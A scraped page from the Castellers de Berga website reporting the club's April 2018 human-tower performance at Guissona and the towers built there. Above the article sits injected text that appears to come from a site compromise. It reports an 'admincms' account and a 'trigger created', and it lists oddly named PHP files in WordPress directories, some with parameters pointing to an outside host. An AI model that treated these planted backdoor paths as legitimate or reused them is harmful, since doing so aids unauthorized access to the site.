Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/ms-upgrade-network-ajax-response-ajax-stream-ajax-response-core-ajax-wp.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/user/profile-stream-ajax-ajax-response-private-meta-cron.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/network/theme-editor-ajax-private-private-meta.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/layerslider-stream-wp-meta-private-private-stream-stream.php https://castellersdeberga.cat/wp-content/plugins/revslider/revslider-meta-core-wp-meta-ajax-stream-wp.php https://castellersdeberga.cat/wp-includes/SimplePie/Rating-wp-meta.php https://castellersdeberga.cat/wp-includes/block-editor-meta-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Actuació a Guissona
 

Actuació a Guissona


Actuació a GuissonaAvui diumenge 22 d’abril de 2018, hem actuat a Guissona, a la diada de l’aniversari dels Margeners de Guissona. La colla de la Segarra fou creada el 2007 i, des la nostra creació – el 2012 –  hi hem coincidit moltes vegades. Era la quarta vegada que actuàvem a Guissona: ho vam fer el 22 d’abril de 2017, el 17 de març de 2013 i el 26 d’abril de 2015.
A la diada de Guissona hi hem descarregat 3 castells de 6 pisos: el 3 de 6 amb agulla, el 2 de 6 (després d’un intent desmuntat) i el 3 de 6, en tercera ronda. En ronda de pilars, hem tornat a descarregar el pilar de 5, el tercer de la temporada. En aquesta actuació lluny de casa no hem pogut sumar camises suficients per descarregar-hi castells de 7 pisos.
Per la seva banda, els Margeners han descarregat el 5 de 6, el 3 de 6 per sota i el 4 de 6 amb agulla. Els Salats de Súria han descarregat el 3 de 6 amb agulla i el 3 de 6 però no han pogut descarregar el 2 de 6 i n’han fet 2 intents desmuntats.
La setmana vinent no actuem però continuen els assajos dimarts i divendres. A més a més, dilluns 23 d’abril tindrem una paradeta al Cine Catalunya, en motiu de Sant Jordi. Els berguedans esperem posar una mica més de gas durant el mes de maig i encarar tres diades importantíssimes: la Fira de Maig a Berga (diumenge 6 de maig), la Festa Major de Puig-reig (diumenge 20 de maig) i la Diada dels Quatre Fuets (diumenge 27 de maig).